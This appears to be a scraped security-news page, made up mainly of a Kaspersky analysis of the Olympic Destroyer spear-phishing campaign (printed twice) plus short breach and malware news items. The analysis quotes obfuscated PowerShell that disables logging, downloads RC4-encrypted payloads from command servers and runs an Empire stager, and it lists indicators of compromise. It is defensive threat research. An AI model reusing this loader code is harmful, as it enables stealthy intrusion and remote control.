The next step was a survey which is sent out to all companies in the running for the award. Its 64 questions must be answered individually by each employee to see how well aligned they are with what is described in the audit. The twenty employees of Panda Sweden completed this survey in September.

One month after completing the audit and the survey, Panda Sweden received the news that they had been awarded the Great Place to Work certification, which automatically qualified the company for inclusion in the Swedish competition.

Some of the factors that made Panda Sweden stand out were its friendly atmosphere and caring environment, its opportunities for individual development, and the employee pride of the work and the company.

One of the team members in Sweden commented that “We have a great atmosphere with nice colleagues and supporting managers. I am proud of our products and our office, and I am happy to recommend it to others.”

When the result was announced, Patrik Kocon, Country Manager for Sweden, Finland, and Denmark congratulated the team in a post on LinkedIn:

“Sometimes it is hard to describe the pride you feel of the team you are part of! This is one of those moments. Thank you all fantastic co-workers for making our office a joy to come to, instead of a must! I am happy this now reaches everyone since we just got awarded the Great Place to Work certification!”

At the Swedish awards ceremony held in March 2018, Panda Security Sweden was ranked 6th out of the 60 companies in the category of companies with less than 50 employees. In the whole country, there are over 1 million companies of this size.

On June 14 2018, at the annual European event in Athens, the results for the Great Place to Work awards for the whole of Europe were announced. Over 2,800 organizations with more than 1.6 million employees were competing. Panda Security Sweden was ranked as the 13th best work place in Europe (in the category of less than 50 employees).

The post Panda Security Sweden: A Great Place to Work appeared first on Panda Security Mediacenter.

Phishing Campaigns Target Sports Fans, Consumers

Two phishing campaigns have been targeting consumers of both the FIFA World Cup and one of its longtime partners, Adidas. One campaign attempts to lure victims into clicking on a malicious link under the guise of downloading a World Cup schedule of fixtures and a result tracker, while the second promises a “free” $50-per-month subscription for Adidas shoes. Today Check Point announced that it has discovered a new phishing campaign linked to the start of the World Cup that targets soccer fans. A known malware that is often used to install potentially unwanted programs (PUPs) and toolbars, adware or system optimizers called DownloaderGuide is embedded in the attachment. Researchers discovered nine different executable files delivered in emails with the subject: “World_Cup_2018_Schedule_and_Scoresheet_V1.86_CB-DL-Manager.”

View full story

ORIGINAL SOURCE: Infosecurity Magazine

The post Phishing Campaigns Target Sports Fans, Consumers appeared first on IT SECURITY GURU.

Attorney-General’s Department caught up in PageUp breach

The Australian Attorney-General’s Department (AGD) has confirmed that some of its staff may have had their information compromised at the hands of HR software provider PageUp, after the company earlier this week admitted some data held on its clients may be at risk. As first reported by SBS News, AGD’s recruitment team sent an email to job applicants informing them it was “possible that some of your personal details which were held in PageUp’s systems may have been accessed by an unauthorised person and possibly disclosed to others”.

View full story

ORIGINAL SOURCE: ZDNet

The post Attorney-General’s Department caught up in PageUp breach appeared first on IT SECURITY GURU.

Not so private eye: Got an Axis network cam? You’ll need to patch it, unless you like hackers

Researchers have detailed a string of vulnerabilities that, when exploited in combination, would allow for hundreds of models of internet-linked surveillance cameras to be remotely hijacked. Security biz VDOO said today it privately alerted cam-maker Axis Communications to the seven bugs it found in its gizmos, leading to the manufacturer issuing firmware updates for roughly 400 models of connected surveillance cameras that would be vulnerable to attack. Owners of at-risk gear are urged advised to update their camera firmware as soon as possible.

View full story

ORIGINAL SOURCE: The Register

The post Not so private eye: Got an Axis network cam? You’ll need to patch it, unless you like hackers appeared first on IT SECURITY GURU.

This sneaky Windows malware delivers adware – and takes screenshots of your desktop

A newly uncovered form of stealthy and persistent malware is distributing adware to victims across the world while also allowing attackers to take screenshots of infected machines’ desktops. Discovered by researchers at Bitdefender, the malware has been named Zacinlo after the name of the final payload that’s delivered by the campaign which first appeared in 2012. The vast majority of Zacinlo victims are in the US, with 90 percent of those infected running Microsoft Windows 10.

View full story

ORIGINAL SOURCE: ZDNet

The post This sneaky Windows malware delivers adware – and takes screenshots of your desktop appeared first on IT SECURITY GURU.

75% of Malware Uploaded on “No-Distribute” Scanners Is Unknown to Researchers

Three-quarters of malware samples uploaded to “no-distribute scanners” are never shared on “multiscanners” like VirusTotal, and hence, they remain unknown to security firms and researchers for longer periods of time. Although some antivirus products will eventually detect this malware at runtime or at one point or another later in time, this leaves a gap in terms of operational insight for security firms hunting down up-and-coming malware campaigns.

View full story

ORIGINAL SOURCE: Bleeping Computer

The post 75% of Malware Uploaded on “No-Distribute” Scanners Is Unknown to Researchers appeared first on IT SECURITY GURU.

MysteryBot Malware Package of Banking Trojan, Ransomware, and Keylogger



Security researchers at ThreatFabric have found a new type of Android malware called MysteryBot, this malware is a combination of banking trojan, keylogger, and a ransomware, making it most destructive malware in the recent times.

Initially, when this malware was found, it was thought to be an updated version of LokiBot, a banking Trojan which wreaked havoc last year as it turned into ransomware whenever someone tried to remove it from their device. But MysteryBot malware has some more threats as comparing LokiBot.

According to researchers both the malware are quite similar and are currently running on the same command and control server. The striking difference between both the malware is that the MysteryBot malware has the capabilities to take control over users' phone. 

A ThreatFabric spokesperson said: "Based on our analysis of the code of both Trojans, we believe that there is indeed a link between the creator(s) of LokiBot and MysteryBot. This is justified by the fact that MysteryBot is clearly based on the LokiBot bot code”.

MysteryBot malware's commands can steal your contacts, emails, messages, remotely start apps saved on a device, manipulate banking apps and also register keystrokes. Their main targets are users who are on Android 7.0 and Android 8.0.

"The encryption process puts each file in an individual ZIP archive that is password protected, the password is the same for all ZIP archives and is generated during runtime. When the encryption process is completed, the user is greeted with a dialog accusing the victim of having watched pornographic material," said ThreatFabric researchers in a blog post. “Most Android banking Trojans seem to be distributed via smishing/phishing & side-loading,” they added.

However, MysteryBot is still under development and is not quite widespread on the internet. But, users are recommended not to install any Android apps from other sources apart from Google Play Store.

Um, excuse me. Do you have clearance to patch that MRI scanner?

Healthcare regulations working against cybersecurity, claims expert

Israel Cyber Week  Healthcare regulations oblige medical equipment vendors to focus on developing the next generation of technologies rather than addressing current cybersecurity issues, according to experts presenting at the eighth Israel Cyber Week.…

French authorities take down ‘Black Hand’ dark web forum selling narcotics, weapons, stolen banking data

The French Minister of Public Action has announced the dismantling of the “Black Hand” forum, a marketplace on the French dark web selling drugs, weapons, stolen credit cards and other illicit goods and services.

On June 12, the National Directorate of Intelligence and Customs Investigations (DNRED) reportedly started raiding key locations in the country where authorities believed they might find the forum’s operators.

Authorities arrested the site’s administrator and several others also seemingly tied to the illegal marketplace. Investigators seized the actual server on which the forum was hosted as well as additional computer equipment, fake identification documents, 4,000 euros in cash and another 25,000 euros in digital currency (i.e. Bitcoin).

After gaining access to the forum’s contents, investigators confirmed that more than 3,000 registered users were selling or buying illegal products and services, including weapons, narcotics, false papers and stolen banking data, through the service.

After 48 hours of custody, the suspects were brought before the magistrates of the Interregional Specialized Court of Lille, where they were charged as follows:

“Criminal conspiracy for the preparation of crime (putting into circulation counterfeit or falsified currency legal tender in France), offenses punishable by 10 years imprisonment (drug trafficking) and offenses punishable by five years’ imprisonment (false administrative documents, scams).”

According to the press release issued by the Ministry of Public Action on Saturday, “this is the end of one of the most important illegal market places for the French dark web.”

Securelist – Kaspersky Lab’s cyberthreat research and reports: Olympic Destroyer is still alive

In March 2018 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.

We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.

The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.

Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.
We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.

In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.

Simplified infection procedure

Infection Analysis

In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.

One of the recent documents that we discovered had the following properties:

MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 2018-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc

The embedded macro is heavily obfuscated. It has a randomly-generated variable and function name.

Obfuscated VBA macro

Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.

It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings such as the command and control (C2) server address.

There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.

Obfuscated commandline Powershell scriptlet

This script disables Powershell script logging to avoid leaving traces:

IF(${GPc}[ScriptBlockLogging])
{
	${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
	${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}

It has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in Powershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.

${k}=  (  .VARiabLE Bqvm  ).vAlUE::"aSCiI".GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&('%'){
	${J}=(${j}+${S}[${_}]+${K}[${_}%${k}."coUNt"])%256;
	${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&('%'){
	${i}=(${i}+1)%256;
	${h}=(${h}+${s}[${I}])%256;
	${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
	${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}."LENgtH"];
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))

The second stage payload downloaded is an HTA file that also executes a Powershell script.

Downloaded access.log.txt

This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:

${k}=  (  Get-vaRiablE  R4Imz  -VAl  )::"aSCIi".GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}."COUNT"])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.('%'){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}."HeaDErS".Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}."LeNGTh"];
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))

The final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the downloaded Empire agent.

$wc.HeAders.Add("User-Agent",$UA);
 $raw = $wc.UploadData($s + "/modules/admin.php","POST",$rc4p2);
 Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
 $AES = $NuLl;
 …
 [GC]::COLLEcT(); 
 Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy; }

Powershell Empire is a post-exploitation free and open-source framework written in Python and Powershell that allows fileless control of the compromised hosts, has modular architecture and relies on encrypted communication. This framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.

Infrastructure

We believe that the attackers used compromised legitimate web servers for hosting and controlling malware. Based on our analysis, the URI path of discovered C2 servers included the following paths:

  • /components/com_tags/views
  • /components/com_tags/views/admin
  • /components/com_tags/controllers
  • /components/com_finder/helpers
  • /components/com_finder/views/
  • /components/com_j2xml/
  • /components/com_contact/controllers/

These are known directory structures used by a popular open source content management system, Joomla:

Joomla components path on Github

Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.

A compromised server using Joomla

Victims and Targets

Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.

Location of targets in recent Olympic Destroyer attacks

Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.

One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.

Decoy document using Spiez Convergence topic

Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury:

Some other spear-phishing documents include words in the Russian and German language in their names:

  • 9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
  • da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
  • e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc

One of the documents included a lure image with perfect Russian language in it.

A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)

One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).

Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggest that the target of this document is working in the biological and epizootic threat prevention field.

Attribution

Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Conclusions

Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

Certain conclusions could be made based on motives and the selection of targets in this campaign. However, it is easy to make a mistake when trying to answer the question of who is behind this campaign with only the fragments of the picture that are visible to researchers. The appearance, at the start of this year, of Olympic Destroyer with its sophisticated deception efforts, changed the attribution game forever. We believe that it is no longer possible to draw conclusions based on few attribution vectors discovered during regular investigation. The resistance to and deterrence of threats such as Olympic Destroyer should be based on cooperation between the private sector and governments across national borders. Unfortunately, the current geopolitical situation in the world only boosts the global segmentation of the internet and introduces many obstacles for researchers and investigators. This will encourage APT attackers to continue marching into the protected networks of foreign governments and commercial companies.

The best thing we can do as researchers is to keep tracking threats like this. We will keep monitoring Olympic Destroyer and report on new discovered activities of this group.

More details about Olympic Destroyer and related activity are available to subscribers of Kaspersky Intelligence Reporting services. Contact: intelreports@kaspersky.com

Indicators Of Compromise

File Hashes

9bc365a16c63f25dfddcbe11da042974 Korporativ .doc
da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
6ccd8133f250d4babefbd66b898739b9 corporativ_2018.doc
abe771f280cdea6e7eaf19a26b1a9488 Scan-2018-03-13.doc.bin
b60da65b8d3627a89481efb23d59713a Corporativ_2018.doc
b94bdb63f0703d32c20f4b2e5500dbbe
bb5e8733a940fedfb1ef6b0e0ec3635c recommandation.doc
97ddc336d7d92b7db17d098ec2ee6092 recommandation.doc
1d0cf431e623b21aeae8f2b8414d2a73 Investigation_file.doc
0e7b32d23fbd6d62a593c234bafa2311 Spiez CONVERGENCE.doc
e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc
0c6ddc3a722b865cc2d1185e27cef9b8
54b06b05b6b92a8f2ff02fdf47baad0e
4247901eca6d87f5f3af7df8249ea825 nakaz.doc

Domains and IPs

79.142.76[.]40:80/news.php
79.142.76[.]40:8989/login/process.php
79.142.76[.]40:8989/admin/get.php
159.148.186[.]116:80/admin/get.php
159.148.186[.]116:80/login/process.php
159.148.186[.]116:80/news.php
ppgca.ufob.edu[.]br/components/com_finder/helpers/access.log
ppgca.ufob.edu[.]br/components/com_finder/views/default.php
narpaninew.linuxuatwebspiders[.]com/components/com_j2xml/error.log
narpaninew.linuxuatwebspiders[.]com/components/com_contact/controllers/main.php
mysent[.]org/access.log.txt
mysent[.]org/modules/admin.php
5.133.12[.]224:333/admin/get.php



Securelist - Kaspersky Lab’s cyberthreat research and reports

Olympic Destroyer is still alive

In March 2018 we published our research on Olympic Destroyer, an advanced threat actor that hit organizers, suppliers and partners of the Winter Olympic Games 2018 held in Pyeongchang, South Korea. Olympic Destroyer was a cyber-sabotage attack based on the spread of a destructive network worm. The sabotage stage was preceded by reconnaissance and infiltration into target networks to select the best launchpad for the self-replicating and self-modifying destructive malware.

We have previously emphasized that the story of Olympic Destroyer is different to that of other threat actors because the whole attack was a masterful operation in deception. Despite that, the attackers made serious mistakes, which helped us to spot and prove the forgery of rare attribution artefacts. The attackers behind Olympic Destroyer forged automatically generated signatures, known as Rich Header, to make it look like the malware was produced by Lazarus APT, an actor widely believed to be associated with North Korea. If this is new to the reader, we recommend a separate blog dedicated to the analysis of this forgery.

The deceptive behavior of Olympic Destroyer, and its excessive use of various false flags, which tricked many researchers in the infosecurity industry, got our attention. Based on malware similarity, the Olympic Destroyer malware was linked by other researchers to three Chinese speaking APT actors and the allegedly North Korean Lazarus APT; some code had hints of the EternalRomance exploit, while other code was similar to the Netya (Expetr/NotPetya) and BadRabbit targeted ransomware. Kaspersky Lab managed to find lateral movement tools and initial infection backdoors, and has followed the infrastructure used to control Olympic Destroyer in one of its South Korean victims.

Some of the TTPs and operational security used by Olympic Destroyer bear a certain resemblance to Sofacy APT group activity. When it comes to false flags, mimicking TTPs is much harder than tampering with technical artefacts. It implies a deep knowledge of how the actor being mimicked operates as well as operational adaptation to these new TTPs. However, it is important to remember that Olympic Destroyer can be considered a master in the use of false flags: for now we assess that connection with low to moderate confidence.
We decided to keep tracking the group and set our virtual ‘nets’ to catch Olympic Destroyer again if it showed up with a similar arsenal. To our surprise it has recently resurfaced with new activity.

In May-June 2018 we discovered new spear-phishing documents that closely resembled weaponized documents used by Olympic Destroyer in the past. This and other TTPs led us to believe that we were looking at the same actor again. However, this time the attacker has new targets. According to our telemetry and the characteristics of the analyzed spear-phishing documents, we believe the attackers behind Olympic Destroyer are now targeting financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine. They continue to use a non-binary executable infection vector and obfuscated scripts to evade detection.

Simplified infection procedure

Infection Analysis

In reality the infection procedure is a bit more complex and relies on multiple different technologies, mixing VBA code, Powershell, MS HTA, with JScript inside and more Powershell. Let’s take a look at this more closely to let incident responders and security researchers recognize such an attack at any time in the future.

One of the recent documents that we discovered had the following properties:

MD5: 0e7b32d23fbd6d62a593c234bafa2311
SHA1: ff59cb2b4a198d1e6438e020bb11602bd7d2510d
File Type: Microsoft Office Word
Last saved date: 2018-05-14 15:32:17 (GMT)
Known file name: Spiez CONVERGENCE.doc

The embedded macro is heavily obfuscated. It has a randomly-generated variable and function name.

Obfuscated VBA macro

Its purpose is to execute a Powershell command. This VBA code was obfuscated with the same technique used in the original Olympic Destroyer spear-phishing campaign.

It starts a new obfuscated Powershell scriptlet via the command line. The obfuscator is using array-based rearranging to mutate original code, and protects all commands and strings such as the command and control (C2) server address.

There is one known obfuscation tool used to produce such an effect: Invoke-Obfuscation.

Obfuscated commandline Powershell scriptlet

This script disables Powershell script logging to avoid leaving traces:

IF(${GPc}[ScriptBlockLogging])
{
	${Gpc}[ScriptBlockLogging][EnableScriptBlockLogging]=0;
	${gpc}[ScriptBlockLogging][EnableScriptBlockInvocationLogging]=0
}

It has an inline implementation of the RC4 routine in Powershell, which is used to decrypt additional payload downloaded from Microsoft OneDrive. The decryption relies on a hardcoded 32-byte ASCII hexadecimal alphabet key. This is a familiar technique used in other Olympic Destroyer spear-phishing documents in the past and in Powershell backdoors found in the infrastructure of Olympic Destroyer’s victims located in Pyeongchang.

${k}=  (  .VARiabLE Bqvm  ).vAlUE::"aSCiI".GETBYtes.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${R}={
${D},${K}=${aRGS};
${s}=0..255;0..255^|^&('%'){
	${J}=(${j}+${S}[${_}]+${K}[${_}%${k}."coUNt"])%256;
	${S}[${_}],${S}[${j}]=${S}[${J}],${S}[${_}]
};
${d}^|^&('%'){
	${i}=(${i}+1)%256;
	${h}=(${h}+${s}[${I}])%256;
	${S}[${i}],${S}[${h}]=${s}[${h}],${s}[${I}];
	${_}-Bxor${S}[(${S}[${I}]+${s}[${h}])%256]
}};
${daTa}=${wc}.DOWNloADDatA.Invoke(https://api.onedrive[.]com/v1.0/shares/s!ArI-XSG7nP5zbTpZANb3-dz_oU8/driveitem/content);
${IV}=${dATa}[0..3];
${dATa}=${dATA}[4..${dAta}."LENgtH"];
-JoIn[CHar[]](^& ${r} ${daTa} (${iV}+${k}))

The second stage payload downloaded is an HTA file that also executes a Powershell script.

Downloaded access.log.txt

This file has a similar structure to the Powershell script executed by the macro in spear-phishing attachments. After deobfuscating it, we can see that this script also disables Powershell logging and downloads the next stage payload from the same server address. It also uses RC4 with a pre-defined key:

${k}=  (  Get-vaRiablE  R4Imz  -VAl  )::"aSCIi".GEtBytEs.Invoke(d209233c7d7d7acee5aa0e8b0889bb1e);
${r}={${D},${K}=${ARGs};
${s}=0..255;
0..255^|.('%'){${j}=(${j}+${S}[${_}]+${k}[${_}%${K}."COUNT"])%256;
${S}[${_}],${s}[${J}]=${s}[${j}],${s}[${_}]};
${d}^|.('%'){${I}=(${I}+1)%256;
${h}=(${h}+${S}[${I}])%256;
${s}[${I}],${S}[${H}]=${s}[${h}],${s}[${i}];
${_}-BxOR${s}[(${s}[${i}]+${S}[${h}])%256]}};
${wC}."HeaDErS".Add.Invoke(Cookie,session=B43mgpQ4No69GDp3PmklQpTZB5Q=);
${SeR}=https://mysent[.]org:443;
${t}=/modules/admin.php;
${dATA}=${wc}.DOWNLOAdDaTA.Invoke(${SeR}+${t});
${iV}=${DATA}[0..3];
${DATA}=${dATA}[4..${dAta}."LeNGTh"];
-JoiN[ChAR[]](^& ${R} ${daTa} (${IV}+${k}))

The final payload is the Powershell Empire agent. Below we partially provide the http stager scriptlet for the downloaded Empire agent.

$wc.HeAders.Add("User-Agent",$UA);
 $raw = $wc.UploadData($s + "/modules/admin.php","POST",$rc4p2);
 Invoke-Expression $($e.GetSTRiNG($(DecrYPT-BYtEs -KeY $kEy -In $raW)));
 $AES = $NuLl;
 …
 [GC]::COLLEcT(); 
 Invoke-Empire -Servers @(($s -split "/")[0..2] -join "/") -StagingKey $SK -SessionKey $key -SessionID $ID -WorkingHours "WORKING_HOURS_REPLACE" -KillDate "REPLACE_KILLDATE" -ProxySettings $Script:Proxy; }

Powershell Empire is a post-exploitation free and open-source framework written in Python and Powershell that allows fileless control of the compromised hosts, has modular architecture and relies on encrypted communication. This framework is widely used by penetration-testing companies in legitimate security tests for lateral movement and information gathering.

Infrastructure

We believe that the attackers used compromised legitimate web servers for hosting and controlling malware. Based on our analysis, the URI path of discovered C2 servers included the following paths:

  • /components/com_tags/views
  • /components/com_tags/views/admin
  • /components/com_tags/controllers
  • /components/com_finder/helpers
  • /components/com_finder/views/
  • /components/com_j2xml/
  • /components/com_contact/controllers/

These are known directory structures used by a popular open source content management system, Joomla:

Joomla components path on Github

Unfortunately we don’t know what exact vulnerability was exploited in the Joomla CMS. What is known is that one of the payload hosting servers used Joomla v1.7.3, which is an extremely old version of this software, released in November 2011.

A compromised server using Joomla

Victims and Targets

Based on several target profiles and limited victim reports, we believe that the recent operation by Olympic Destroyer targets Russia, Ukraine and several other European countries. According to our telemetry, several victims are entities from the financial sector in Russia. In addition, almost all the samples we found were uploaded to a multi-scanner service from European countries such as the Netherlands, Germany and France, as well as from Ukraine and Russia.

Location of targets in recent Olympic Destroyer attacks

Since our visibility is limited, we can only speculate about the potential targets based on the profiles suggested by the content of selected decoy documents, email subjects or even file names picked by the attackers.

One such decoy document grabbed our attention. It referred to ‘Spiez Convergence’, a bio-chemical threat research conference held in Switzerland, organized by SPIEZ LABORATORY, which not long ago was involved in the Salisbury attack investigation.

Decoy document using Spiez Convergence topic

Another decoy document observed in the attacks (‘Investigation_file.doc’) references the nerve agent used to poison Sergey Skripal and his daughter in Salisbury:

Some other spear-phishing documents include words in the Russian and German language in their names:

  • 9bc365a16c63f25dfddcbe11da042974 Korporativ.doc
  • da93e6651c5ba3e3e96f4ae2dd763d94 Korporativ_2018.doc
  • e2e102291d259f054625cc85318b7ef5 E-Mail-Adressliste_2018.doc

One of the documents included a lure image with perfect Russian language in it.

A message in Russian encouraging the user to enable macro (54b06b05b6b92a8f2ff02fdf47baad0e)

One of the most recent weaponized documents was uploaded to a malware scanning service from Ukraine in a file named ‘nakaz.zip’, containing ‘nakaz.doc’ (translated as ‘order.doc’ from Ukrainian).

Another lure message to encourage the user to enable macro

According to metadata, the document was edited on June 14th. The Cyrillic messages inside this and previous documents are in perfect Russian, suggesting that it was probably prepared with the help of a native speaker and not automated translation software.

Once the user enables macro, a decoy document is displayed, taken very recently from a Ukrainian state organization (the date inside indicates 11 June 2018). The text of the document is identical to the one on the official website of the Ukrainian Ministry of Health.

Decoy document inside nakaz.doc

Further analysis of other related files suggest that the target of this document is working in the biological and epizootic threat prevention field.

Attribution

Although not comprehensive, the following findings can serve as a hint to those looking for a better connection between this campaign and previous Olympic Destroyer activity. More information on overlaps and reliable tracking of Olympic Destroyer attacks is available to subscribers of Kaspersky Intelligence Reporting Services (see below).

Similar obfuscated macro structure

The documents above show apparent structural similarity as if they were produced by the same tool and obfuscator. The highlighted function name in the new wave of attacks isn’t in fact new. While being uncommon, a function named “MultiPage1_Layout” was also found in the Olympic Destroyer spear phishing document (MD5: 5ba7ec869c7157efc1e52f5157705867).

Same MultiPage1_Layout function name used in older campaign

Conclusions

Despite initial expectations for it to stay low or even disappear, Olympic Destroyer has resurfaced with new attacks in Europe, Russia and Ukraine. In late 2017, a similar reconnaissance stage preceded a larger cyber-sabotage stage meant to destroy and paralyze infrastructure of the Winter Olympic Games as well as related supply chains, partners and even venues at the event location. It’s possible that in this case we have observed a reconnaissance stage that will be followed by a wave of destructive attacks with new motives. That is why it is important for all bio-chemical threat prevention and research companies and organizations in Europe to strengthen their security and run unscheduled security audits.

The variety of financial and non-financial targets could indicate that the same malware was used by several groups with different interests – i.e. a group primarily interested in financial gain through cybertheft and another group or groups looking for espionage targets. This could also be a result of cyberattack outsourcing, which is not uncommon among nation state actors. On the other hand, the financial targets might be another false flag operation by an actor who has already excelled at this during the Pyeongchang Olympics to redirect researchers’ attention.

